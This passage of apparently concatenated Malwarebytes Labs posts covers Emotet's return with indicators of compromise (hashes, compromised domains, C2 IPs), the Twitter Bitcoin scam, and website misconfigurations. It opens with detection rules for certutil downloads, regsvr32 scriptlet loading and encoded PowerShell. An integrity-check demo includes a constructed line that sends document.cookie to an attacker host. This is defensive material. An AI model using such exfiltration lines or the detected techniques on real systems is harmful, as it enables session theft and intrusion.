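def is_certutil_download(cmd: str) -> bool:
    """certutil used as a downloader: -urlcache plus -f and a URL (certutil accepts - or /)."""
    tokens = cmd.split()
    flags = {t[1:].lower() for t in tokens if t[:1] in ("-", "/")}
    has_url = any(t.lower().startswith(("http://", "https://")) for t in tokens)
    return "urlcache" in flags and "f" in flags and has_url


def is_squiblydoo(cmd: str) -> bool:
    """regsvr32 loading scrobj.dll with an /i: scriptlet (local path or URL)."""
    c = cmd.lower()
    return "scrobj.dll" in c and ("/i:" in c or "-i:" in c)


def is_encoded_powershell(cmd: str) -> bool:
    c = cmd.lower()
    return bool(ENCODED_PS.search(c)) or "frombase64string" in c


def detect(events: List[Dict]) -> List[Tuple[str, str]]:
    """Return (rule, lineage) pairs for suspicious process creations."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        name = basename(ev["image"])
        chain = lineage(ev, by_pid)
        ancestors = set(chain[1:])
        cmd = ev["cmdline"]
        office_rooted = bool(ancestors & OFFICE)
        if name == "certutil.exe" and office_rooted and is_certutil_download(cmd):
            alerts.append(("mgbot_dde_certutil_download", " <- ".join(chain)))
        elif name == "regsvr32.exe" and office_rooted and is_squiblydoo(cmd):
            alerts.append(("squiblydoo_scriptlet_execution", " <- ".join(chain)))
        elif name == "powershell.exe" and "wmiprvse.exe" in ancestors and is_encoded_powershell(cmd):
            alerts.append(("emotet_wmi_spawned_powershell", " <- ".join(chain)))
    return alerts


if __name__ == "__main__":
    for rule, chain in detect(EVENTS):
        print(f"{rule}: {chain}")
```

The Emotet rule keys on the WmiPrvSE.exe parent because the WMI hop breaks the direct Word-to-PowerShell parent link; a rule that only looks for Office as the immediate parent misses it.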

Emotet has returned to its old tricks

The Emotet Trojan was by far the most visible and active threat on our radars in 2018 and 2019—right up until it went into an extended break.

Emotet is used by cybercriminals as the initial entry point, followed by a dwell time that can last days or weeks. In the meantime, other threats such as TrickBot can be delivered as a secondary payload.

The real damage that an Emotet compromise causes happens when it forms alliances with other malware gangs and in particular threat actors interested in dropping ransomware.

Malwarebytes users were already protected against Emotet thanks to our signature-less anti-exploit technology.

Malwarebytes blocks emotet with signature-less anti-exploit technology

We also detect the Emotet binary as a standalone file:

Malwarebytes detects Emotet binary as a standalone file

Indicators of Compromise

Malicious documents

5d2c6110f2ea87a6b7fe9256affbac0eebdeee18081d59e05df4b4a17417492b
4fdff0ebd50d37a32eb5c3a1b2009cb9764e679d8ee95ca7551815b7e8406206
bb5602ea74258ccad36d28f6a5315d07fbeb442a02d0c91b39ca6ba0a0fe71a2
6d86e68c160b25d25765a4f1a2f8f1f032b2d5cb0d1f39d1d504eeaa69492de0
18fab1420a6a968e88909793b3d87af2e8e1e968bf7279d981276a2aa8aa678e
d5213404d4cc40494af138f8051b01ec3f1856b72de3e24f75aca8c024783e89

Compromised sites

elseelektrikci[.]com
rviradeals[.]com
skenglish[.]com
packersmoversmohali[.]com
tri-comma[.]com
ramukakaonline[.]com
shubhinfoways[.]com
test2.cxyw[.]net
sustainableandorganicgarments[.]com
staging.icuskin[.]com
fivestarcleanerstx[.]com
bhandaraexpress[.]com
crm.shaayanpharma[.]com
zazabajouk[.]com
e2e-solution[.]com
topgameus[.]com
cpads[.]net
tyres2c[.]com
thesuperservice[.]com
ssuse[.]com

Emotet binaries

454d3f0170a0aa750253d4bf697f9fa21b8d93c8ca6625c935b30e4b18835374
d51073eef56acf21e741c827b161c3925d9b45f701a9598ced41893c723ace23
1368a26328c15b6d204aef2b7d493738c83fced23f6b49fd8575944b94bcfbf4
7814f49b3d58b0633ea0a2cb44def98673aad07bd99744ec415534606a9ef314
f04388ca778ec86e83bf41aa6bfa1b163f42e916d0fbab7e50eaadc8b47caa50

C2s

178.210.171[.]15
109.117.53[.]230
212.51.142[.]238
190.160.53[.]126

The post It’s baaaack: Public cyber enemy Emotet has returned appeared first on Malwarebytes Labs.

Coordinated Twitter attack rakes in 100 grand

“I’m feeling generous because of Covid-19. I’ll double any BTC payment sent to my BTC address for the next hour. Good luck, and stay safe out there!”

This and similar Tweets asking readers to send US$1,000 to a Bitcoin address with the promise of a double return payment went out yesterday.

message

Too good to be true?

Once again, social engineering has been demonstrated to be a powerful attack vector. Who would fall for such a ruse, you may ask? Looking at the transactions to said Bitcoin address, more than 100 people were duped.

bitcoinaddress
The threat actors managed to rake in a substantial sum and divide it between themselves.

The victims that sent Bitcoin to this address probably do not feel so good about themselves right now. But in their defense, some of the accounts that were Tweeting out these messages were trusted figures with verified Twitter accounts. To name a few: Elon Musk, Bill Gates, Barack Obama, Kanye West, Warren Buffett, Jeff Bezos, Joe Biden, and many other high-profile accounts were taken over.

What happened?

The official Twitter Support account states that their investigation is still ongoing, but it has revealed that threat actors gained unauthorized access and used it to take control of many highly-visible (including verified) accounts and Tweet on their behalf.

From other sources we learned that the threat actors managed to use social engineering on a Twitter employee to gain access to their control panel. Through the employee panel, they were able to change associated email addresses for many accounts to addresses under their control. They then used that as a means to reset the password for the account and disable 2FA.

During the ongoing Twitter storm of misleading Tweets, Twitter Support locked down the affected accounts and removed Tweets posted by the attackers as fast as they could find them. They also limited functionality for a much larger group of accounts, like all verified accounts (even those with no evidence of being compromised) during the investigation.

disruptive
Disabling the verified accounts was disruptive, but important to reduce risk

What should I do?

If you think you might be the owner of an affected account, you should:

  • Not feel bad because this one was not on you
  • Check if the address listed under email is yours
  • Reset and change your password
  • Enable 2FA

All these settings can be found when you are logged in to Twitter under More > Settings and privacy. Another setting worth considering is Password reset protect, which can be found under Additional password protection. Even though it probably would not have helped against this attack, it can help by sending you a text or email when someone requests a password reset on your account. In this case, I’m pretty sure the employee panel would have allowed the attackers to disable that option as well.

Can victims retrieve Bitcoin?

Unfortunately, it is virtually impossible to get back stolen Bitcoin from the attackers. They are probably laundering the money right now. They will use Bitcoin mixing services to hide where the Bitcoin came from and Bitcoin exchange services to anonymously convert Bitcoin into spendable money.

The best move now is to scrutinize each and every request for donations, payments, or services—whether you know the person or not. Social engineering is a trick as old as time, and the reason it’s still so popular is that it still works.

Stay vigilant and stay safe, everyone!

The post Coordinated Twitter attack rakes in 100 grand appeared first on Malwarebytes Labs.

Website misconfigurations and other errors to avoid

Website owners, listen up: There are lots of things you shouldn’t do with your site, and many more you should avoid with the domains you’re responsible for. Insider malice, bad luck, and the stars aligning in impossible ways can all give your online portfolio a bad hair day. However, if you want to tempt fate, you can bring on the mayhem with website misconfigurations and other ill-fortuned security and privacy errors.

In the last week, we’ve seen a few of these website mistakes go public, so we wanted to give site owners a gentle reminder to watch out for easily avoidable, but even easier to walk into—and pay the piper afterwards—errors.

Spoiler alert: Do not pay the piper.

Paying the piper: Salacious subdomains

Subdomains are a great way to add depth to your website, branching off from the main domain and allowing for content categorization. They can help make huge, unwieldy portals a little more manageable.

Problems arise when someone creates a bunch of complicated subdomains resolving to different places, and they later fall into a state of abandonment, as was the case with several mega-corporations, including Chevron, the Red Cross, and Getty Images. This unfortunately leads to issues the subdomains were never intended to address.

Opportunists took note of the sheer number of abandoned official subdomains and figured out a way to game the Azure system powering everything behind the scenes. If you didn’t know, Azure is Microsoft-powered cloud technology with a big splash of virtualisation thrown into the mix. 

What did they do?

I’ll give you a straightforward, non-Azure related example. You set up a website, yourwebsite(dot)com. You don’t want to bother with managing hosting and all the nitty-gritty that comes with it, so you point your URL at a website hosted on a free platform. Let’s go with yourwebsite(dot)freebloggingplatform(dot)com.

After a while, you become bored with your website and it falls into disrepair. You haven’t touched it in months, but someone got their hands on the blog the URL was pointing at, compromised it, and turned it into a horrendous pornography spam farm.

Imagine something similar with Azure, except instead of just the main domain (the landing page for your website), you created lots of subdomains like myfavouritemovies(dot)yourwebsite(dot)com and myfavouritebooks(dot)yourwebsite(dot)com.

Each of these subdomains pointed, via a CNAME record, to hosted webspace on Azure, and when the organisation no longer needed the hosted space, it was released back into the wild for anybody else to grab. Unfortunately, someone in admin land forgot to remove the DNS record, so the subdomain(s) kept pointing at the now relinquished Azure hostname, and it’s at this point the scammers swoop in: they register a fresh Azure resource under the same name, and the company’s subdomain now resolves to content they control.

Congratulations, website owner: You now have a forgotten-about subdomain with a good search engine page rank pointing at newly-created spam/porn/drugs/who-knows-what content.

It’s not just spam and dodgy deals you must be wary of. You could find yourself pointing your website at phishing scams, malware installs, or potentially illegal content. A hijacked subdomain can also read or set cookies scoped to the parent domain, so it might be used for cookie harvesting or any number of awful Internet shenanigans you don’t want to get tangled up in.

Your visitors could easily be directed to a site playing host to credit card skimmers.

These so-called “dangling DNS entries” now have a support page over on the Microsoft portal, and it’s well worth a read if you expect to be managing subdomains in the near future. These kinds of attacks are almost certainly automated, so you can expect your org to be caught up if some spare subdomains are left out in the cold, waving a large “please hijack me” sign.

Keep your subdomains safe, register your domains in Google Search Console, and make sure your big list of DNS records is on an actual list: an inventory you check every time a hosted resource is decommissioned, so the DNS record goes away with it. Here are some more tips on how to fix a subdomain takeover, if you’re interested.
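A practical way to keep that inventory honest is to audit it for exactly the condition described above: a CNAME that points at a re-registrable cloud hostname whose resource no longer exists. The script below is an added example written for this post (it is not Malwarebytes code and not the Microsoft guidance); the zone data and resolver answers are constructed, the suffix list is illustrative rather than exhaustive, and `live_resolver()` is the hypothetical drop-in for a real run.

```python
"""Dangling-CNAME audit: an added example, not code from the post or from Microsoft.

Reads DNS records in a simple 'name TYPE target' form (as a zone export might
give you), picks out CNAMEs that point at cloud hostnames which go back into a
shared pool when the resource behind them is deleted, and flags those whose
target no longer resolves. Anyone can re-create a resource under such a name,
so each finding is a subdomain you may already have lost.

The resolver is passed in as a function so the logic can be exercised offline
against constructed data; live_resolver() below is the real thing.
"""
import socket
from dataclasses import dataclass
from typing import Callable, Iterable, List

# Hostname suffixes whose names are re-registrable once released.
# Assumption: illustrative list, not exhaustive; extend it for the providers you use.
TAKEOVER_PRONE_SUFFIXES = (
    ".azurewebsites.net",
    ".cloudapp.azure.com",
    ".cloudapp.net",
    ".blob.core.windows.net",
    ".trafficmanager.net",
    ".azureedge.net",
)


@dataclass(frozen=True)
class Record:
    name: str
    rtype: str
    target: str


@dataclass(frozen=True)
class Finding:
    name: str
    target: str
    reason: str


def parse_zone_lines(lines: Iterable[str]) -> List[Record]:
    """Parse 'name TYPE target' lines; ';' starts a comment, blanks are skipped."""
    records = []
    for raw in lines:
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) != 3:
            continue  # not in the simple form this example understands
        name, rtype, target = parts
        records.append(Record(name.rstrip(".").lower(), rtype.upper(), target.rstrip(".").lower()))
    return records


def is_takeover_prone(target: str) -> bool:
    return target.endswith(TAKEOVER_PRONE_SUFFIXES)


def live_resolver(host: str) -> bool:
    """True if the host has an address; NXDOMAIN (or any lookup failure) counts as not resolving."""
    try:
        socket.gethostbyname(host)
        return True
    except socket.gaierror:
        return False


def audit(records: Iterable[Record], resolves: Callable[[str], bool]) -> List[Finding]:
    """Return one Finding per CNAME whose cloud target no longer exists.

    A target that still resolves is not proof of safety (some services answer
    for every name and need an HTTP fingerprint check instead), but a target
    that does not resolve on a re-registrable suffix is a claimable name.
    """
    findings = []
    for r in records:
        if r.rtype != "CNAME" or not is_takeover_prone(r.target):
            continue
        if not resolves(r.target):
            findings.append(Finding(r.name, r.target, "CNAME target does not resolve; name is claimable"))
    return findings


# Constructed sample zone (not real records) showing the shapes you will meet.
# blog.example.com points at a platform not in the suffix list, so it is not
# checked here: add the platforms you actually use to TAKEOVER_PRONE_SUFFIXES.
SAMPLE_ZONE = """
; example.com export (constructed for this example)
www.example.com.                 CNAME  example.azurewebsites.net.
myfavouritemovies.example.com.   CNAME  movies-2017-campaign.azurewebsites.net.
assets.example.com.              CNAME  cdnprofile-old.azureedge.net.
blog.example.com.                CNAME  example.freebloggingplatform.com.
mail.example.com.                A      203.0.113.10
"""

# Constructed resolver results: the long-dead campaign site and the old CDN
# endpoint have been deleted, the rest still answer.
_STUB_TABLE = {
    "example.azurewebsites.net": True,
    "movies-2017-campaign.azurewebsites.net": False,
    "cdnprofile-old.azureedge.net": False,
    "example.freebloggingplatform.com": True,
}


def stub_resolver(host: str) -> bool:
    return _STUB_TABLE.get(host, False)


def run_sample() -> List[Finding]:
    return audit(parse_zone_lines(SAMPLE_ZONE.splitlines()), stub_resolver)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.name} -> {f.target}: {f.reason}")
```

Run it against a real export by swapping `stub_resolver` for `live_resolver`. Treat every finding as urgent: the fix is either to delete the record or to re-create the resource yourself before someone else does.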

Paying the piper: Any road is code

A CDN is a content delivery/distribution network. They’re the bits and pieces of the Internet tapestry theoretically close to where you’re located, with the task of bypassing bottlenecks and hurling content in your direction faster than it would’ve arrived otherwise.

And now, for the somewhat more cynical take: If you’ve ever loaded up a website and marveled at how slow the content was but how fast the 26 adverts were, loading before the site did: That’s the wonder of a decent CDN.

Anyway.

CDNs can be used to serve up various bits and pieces of a site as and when required. It’s not uncommon for chunks of code to be pumped into the page from multiple sources, but you must weigh that convenience against the risk of the site breaking, and against the fact that your visitors now run whatever code those sources happen to serve.

What if the CDN has been serving up bad files and finds itself on a block list? What if it simply fails to load and breaks the website’s functionality? There are all sorts of things that can go wrong with that kind of setup.

What happened?

Something you probably wouldn’t expect to see is a major bank using the Internet Archive as a CDN resource. The Internet Archive is where old websites and other content live on, and it’s tremendously helpful for archival purposes. 

For some peculiar reason, Barclays bank was linking directly to an archived page to serve up their own JavaScript code. Barclays have no control over the content hosted on the Internet Archive, and if someone managed to tamper with the code, it could give banking customers quite the headache (or the site could simply lose functionality if Internet Archive went down or the page was removed for whatever reason).

Now I’m thinking back—again—to the various caveats and requirements banks place on customers to make sure they’re doing their due diligence. How would banking customers have any idea about this going on under the hood if it ended up causing them some sort of security issue? Would suspicion first fall upon the customer? How would they prove they weren’t to blame for something going wrong?

Sometimes organisations lose bits of code and have no backups. I don’t think that’s likely in this case, but if you don’t want to end up in a similar situation and start grabbing files/links from somewhere like the Internet Archive, please make backups. (And check where, exactly, you’re copying and pasting code from.)
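The tampering risk raised in the CDN section and in the Barclays case has a standard browser-side mitigation, Subresource Integrity: the page ships a hash of the file it expects, and the browser refuses to execute a script whose bytes no longer match. The helper below is an added example, not code from the post or from Barclays; the script body and the “tampered” variant are constructed stand-ins, and nothing is fetched over the network.

```python
"""Subresource Integrity (SRI) helper: an added example, not code from the post or from Barclays.

Computes the integrity attribute for a <script> tag so the browser refuses to
execute a CDN- or third-party-hosted file whose bytes no longer match what you
shipped, and reproduces the browser-side check. The script body is a constructed
stand-in; nothing is fetched over the network.
"""
import base64
import hashlib
import hmac

SRI_ALGOS = ("sha256", "sha384", "sha512")  # the only digests browsers accept for SRI


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return '<algo>-<base64 digest>' in the form the integrity attribute expects."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"SRI does not support {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes, algo: str = "sha384") -> str:
    """Build the tag to ship. crossorigin is required for SRI on cross-origin URLs."""
    return (f'<script src="{src}" integrity="{sri_hash(content, algo)}" '
            f'crossorigin="anonymous"></script>')


def verify(content: bytes, integrity: str) -> bool:
    """Mirror the browser: the attribute may list several hashes; any match passes."""
    for token in integrity.split():
        algo, sep, expected = token.partition("-")
        if not sep or algo not in SRI_ALGOS:
            continue  # browsers ignore tokens they do not understand
        actual = sri_hash(content, algo).partition("-")[2]
        if hmac.compare_digest(actual, expected):
            return True
    return False


# Constructed stand-in for a file you would otherwise pull from a CDN or, as in
# the Barclays case, from an archive you do not control.
ORIGINAL_JS = b"window.BankUI = { login: function (u, p) { return post('/login', {u: u, p: p}); } };\n"
# The same file after someone with write access to the host has added a line (constructed).
TAMPERED_JS = ORIGINAL_JS + b"new Image().src = 'https://attacker.invalid/?' + document.cookie;\n"


def demo():
    """Generate the tag for the original file, then check both versions against it."""
    tag = script_tag("https://cdn.example.net/bank-ui.js", ORIGINAL_JS)
    integrity = tag.split('integrity="')[1].split('"')[0]
    return {
        "tag": tag,
        "original_ok": verify(ORIGINAL_JS, integrity),
        "tampered_ok": verify(TAMPERED_JS, integrity),
    }


if __name__ == "__main__":
    result = demo()
    print(result["tag"])
    print("original passes:", result["original_ok"])
    print("tampered passes:", result["tampered_ok"])
```

SRI covers integrity, not availability: if the host disappears or the file changes legitimately, the script simply fails to load, which is the safe outcome but still an outage. So pin the hash for anything you pull from elsewhere, and self-host (with a backup) anything the site cannot live without.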

Paying the piper: breaking down the breakdowns

Those are just two of the most recent examples of website mishaps that can lead to malicious takeovers or simply result in an inability to function. Those aren’t the only ways for things to go wrong, though. What else should you be looking out for and doing?

Update, update, update. If you don’t, people could bludgeon their way into your content management system/blogging platform and stuff the site with SEO spam. If your site ends up in the news for an unrelated reason, you could inadvertently drive lots of visitors to potentially bad places.

Think about all those credentials you have tied to your platforms. Is everybody listed still working at your organisation? Or do you have lots of insecure admin accounts with basic passwords scattered about the place?

Has the platform you use to power your blog been abandoned? If it’s no longer updated, you could well receive a visit from the website hack inspector. Even the biggest organisations are not immune to the perils of platform mishaps. You’ll never know the impact until everything is already burning away in some sort of digital firestorm.

It may well be worth drawing up a short digital to-do list and giving your site an inspection, because so many intricate moving parts almost demand the wheels coming off at some point. Get ahead of the curve, throw on your welding goggles, and give that site of yours the tuneup inspection of a lifetime.

The post Website misconfigurations and other errors to avoid appeared first on Malwarebytes Labs.